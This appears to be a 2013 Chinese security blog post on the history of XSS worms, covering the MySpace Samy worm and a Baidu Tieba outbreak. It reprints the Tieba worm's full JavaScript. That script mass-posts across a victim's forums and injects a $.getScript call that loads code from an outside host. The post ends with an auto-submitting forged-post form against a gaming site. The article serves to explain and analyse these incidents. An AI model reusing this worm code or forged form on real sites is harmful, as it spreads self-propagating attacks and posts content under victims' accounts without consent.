蠕蟲來了！小議xss worm的前世今生

作者：佚名 2013-05-22 11:00:59

日前，百度貼吧爆發了一次xss 蠕蟲，這個蟲子幾乎把整個貼吧都爬了一遍。xss worm到底是一個什么樣的技術？今天就乘著度娘爆發的小蟲子，看看xss worm的前世今生。

一、世界上的第一條xss 蟲子

在2005年10月初，第一只Web 2.0蠕蟲I-Worm/JS.Sammy也是利用著名網絡社區MySpace.com的系統漏洞，以跨站腳本攻擊(XSS)的方式進行傳播的Sammy 蠕蟲的作者在社區個人資料中插入病毒腳本，當其他MySpace.com用戶查看他的資料時，病毒腳本就會運行，自動把病毒作者加為好友，同時病毒本身也會被復制到瀏覽者的個人資料里面。不到20個小時，就有超過100萬MySpace.com用戶受到感染，造成網站一度癱瘓。MySpace.com為此不得不禁止所有用戶在個人資料中加入任何腳本程序。

——from《web2.0網站安全思考》

這是世界上的第一條xss蟲子，不像以前的蠕蟲，只要是在MySpace.com這個域網絡社區為平臺，無論前端用戶的計算機是什么系統，只要瀏覽器執行，那用戶即可能被感染，

其后國內也爆發過一陣，飯否、百度空間、渣浪，都有過被蟲子蠕動的經歷，其實可以看的出來，這些站點都有一個相同點，他們的交互性很強，一個用戶參與度高的站導致了用戶對頁面的操作權限很高，蟲子也就通過這一點爆發。它滿足病毒的性質，在web上通過HTTP請求各種傳播，利用客戶端執行一些惡意javascript腳本。

[1]對使用者的數據具有操作權限

[2]也可以對網站造成阻止服務攻擊(我不習慣說拒絕服務攻擊，因為deny應該翻譯為組織，拒絕是雙方行為，而攻擊發生并不是受害方主動拒絕，而是對其服務進行阻止，對這個名稱不服的請來辯!)

[3]邪惡的傳播網馬，比如通過ActiveX控件進行本地攻擊(這個控件我就不太想吐槽了，之前在我空間里發過一個利用該控件進行本地溢出的。。。不多說，蛋疼)，因為worm的傳播速度本來就快的飛起，網馬結合后造成的攻擊力，我想應該是成噸的傷害。

二、度娘的worm

var forumName = [];  
var forumId = [];  
for (var i = 0, j = 0; i <PageData.user.user_forum_list.info.length; i++) { if (PageData.user.user_forum_list.info[i].user_level > 3) {  
if (PageData.user.user_forum_list.info[i].forum_name!=”璐村惂鐩戞帶”) {  
forumName[j] = PageData.user.user_forum_list.info[i].forum_name;  
forumId[j] = PageData.user.user_forum_list.info[i].id;  
 
j++;  
}  
}  
}  
function madeit(myKw, myFid) {  
var c = rich_postor._getData();  
c.content=”\\u8bf7\\u5141\\u8bb8\\u6211\\u505a\\u4e00\\u4e2a\\u5fe7\\u4f24\\u7684\\u8868\\u60c5\\uff0c\\u662f\\u5fe7\\u4f24\\u54e6\\uff01″;  
cc.ftid = c.fid;  
c.ptid = “2337372175″;  
c.title = ‘\\u70b9\\u8fdb\\u6765\\u6709..”,a:$.getScript(\\’//xss.retaker.me/1.js\\’),a:”‘;  
c.fid = myFid;  
c.kw = myKw;  
$.post(“/relay/commit”, c);  
}  
//now begin!  
for (j = 0; j < forumName.length; j++) {  
setTimeout(“madeit(‘” + forumName[j] + “‘,’” + forumId[j] + “‘)”, 1500 * j);  
 
}

這就是造成那個蟲子的腳本，度娘響應還是快的，刪貼神馬的，不過最終停止是這個第三方js失效，截圖如下：

可以看到，影響蠻大的，這個蟲子的行為是：一個用戶中招后，就會在所有該用戶收藏的貼吧中發帖，其傳播速度可想而知了

第三方js的地址為：http://xss.retaker.me/1.js(現已失效)

在爆發時有個臨時解決方案，即：在C:\Windows\System32\drivers\etc\hosts用記事本打開，添加127.0.0.1 xss.retaker.me

其實更覺得這位小哥像是在測試，然后就一不小心爆發了...(好吧，我還是太善良了)

除了本次事件外，在08年的度娘也爆發過一次

三、11平臺的蟲子

其實也不算是真正的xss worm，只是傳播類似，好像是去年我才開學吧，我當時才學習前端安全不久(一直玩滲透，前端安全也是當工具用～)新浪微博好像是就挖出一個潛在的蟲子，是個持久性的xss，在個人設置中個人資料填寫存在持久性xss，當鼠標停留在用戶id時，即觸發xss攻擊

寫一個post請求

<form accept-charset="utf-8" onsubmit="document.charset='utf-8';document.getElementById('intro').value = decodeURIComponent(document.getElementById('intro').value);" name="form" method="post" action="http://i.5211game.com/request/" target="_self" >
 <input name="method" type="text" value="publish">
 <input name="tag" type="text" value="">
 <input name="pic" type="text" value="">
 <input name="content" value="么么噠～@測試id">
 <input name="tx" type="text" value="0">
 <input name="sina" type="text" value="0">
 <input name="lastId" type="text" value="2522856">
 <input name="oldId" type="text" value="2514419">
        <input name="lasttime" type="text" value="1343530565579">
        <input name="tp" type="text" value="phrase">
 <input name="submit" type="image" src="http://xxxxxxxxxx" value="11111" onclick="submit()"/>
</form>
<script type="text/javascript">
document.form.submit();
</script>